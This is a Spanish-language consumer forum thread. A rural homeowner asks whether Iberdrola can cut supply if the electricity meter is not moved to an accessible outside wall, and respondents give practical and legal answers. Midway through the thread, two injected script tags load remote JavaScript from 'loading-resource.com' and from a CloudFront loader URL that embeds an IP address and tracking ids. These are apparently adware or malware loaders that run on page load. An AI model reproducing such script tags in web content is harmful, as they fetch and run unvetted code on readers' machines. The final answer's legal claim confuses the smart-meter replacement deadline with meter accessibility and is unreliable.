¿Puede iberdrola rescindirme el contrato si no saco el contador de la luz a la calle?

Tengo una vivienda en la que no resido y que voy en muy pocas ocasiones. Doy lecturas del contador de tanto en tanto, cuando voy a la casa. Acabo de recibir una notificación de Iberdrola en la que me dan un plazo máximo de 2 meses para realizar las modificaciones necesarias en mi instalación para que el contador quede accesible a sus lectores de forma permanente, en caso contrario me dicen quee se verán obligados a interrumpir el suministro eléctrico a partir del día x de acuerdo con la legislación vigente (R.D. 1955/2000 y 1110/2007) que permite incluso la resolución del contrato

¿Pueden hacerlo? ¿Pueden dejarme sin luz?. Otra duda que tengo es que si yo saco el contador a la calle, entonces estaré cambiando la acometida y por tanto ¿tendré qué hacer nuevo boletín? ¿Habría de cambiar también el contrato?

Mi contador es de los antiguos, ya que se trata de una vivienda antigua en el medio rural.

Me quedan 5 semanas para que se cumpla el plazo de la amenaza... ¿es legal esto que me dicen?

2 respuestas

Respuesta

Ciertamente pueden rescindirte el contrato, exigen esto para poder tomar las lecturas reales, aunque luego en la teoría muchas veces no las toman... una vez que lo hayas hecho no suelen pedir boletín, ellos lo que te piden es que lo saques fuera, nada mas, hay casos en los que no es necesaria cambiarla, simplemente si es una linea aérea como pasa en muchos pueblos se intercala el contador justo antes de entrar en la vivienda y ya esta.

Hola, muchas gracias.

Entonces, ¿cuáles son los pasos a seguir?. ¿Cojo el contador actual, lo quito de donde está, busco la línea aérea y conecto el contador?. Bueno, que lo haga alguien profesional, pero ¿sería así?. El cable de luz viene desde la derecha mirando la fachada (creo yo) que hay otra vivienda, pero en realidad el único lugar posible para poner el contador es a la izquierda...  Mmmmm no sé cómo explicar esto, tal vez no he entendido lo de la línea aérea,¿me lo puedes explicar un poco más?. El contador lo tengo actualmente según entras en la casa a mano derecha, y tendría que llevarlo hasta la fachada perpendicular, ya que la vivienda tiene un pequeño jardín vallado al frente.

Y si me cambio de compañía ¿también me exigirán sacar el contador?

Bufff, no sé muy bien ni qué hacer ni cómo hacerlo.

Muchas gracias por adelantado

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7B01301832-6271-4E3E-AD59-A5B0559C6ED4%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=60&ccid=Vall%EF%BF%BDs&ip=95.214.32.81"></script>

Lo primeros debes ponerte en contacto con un instalador autorizado, darte un consejo sobre su colocación sin verlo es muy difícil, tiene que ser en la fachada exterior de de la casa, en la calle, normalmente se puede intercalar en la linea antes de entrar en la casa, pero eso depende de como este hecha la instalación de la compañía, si no se puede de esta manera entonces habrá que hacerlo según la situación y quizás haya que cambiar la linea desde el contador a la vivienda, pero como te digo depende de cada caso.

Respuesta

No estas obligado por ley al cambio del contador hasta Diciembre de 2018.

De ahí en adelante será obligatorio y no pueden amenazarte con cortar la luz.

Deacuerdo con la normativa vigente la implantación de los nuevos contadores puede hacerse hasta Diciembre de 2018 y si te lo instalan sin estar presente puedes denunciar ante el ministerio de industria.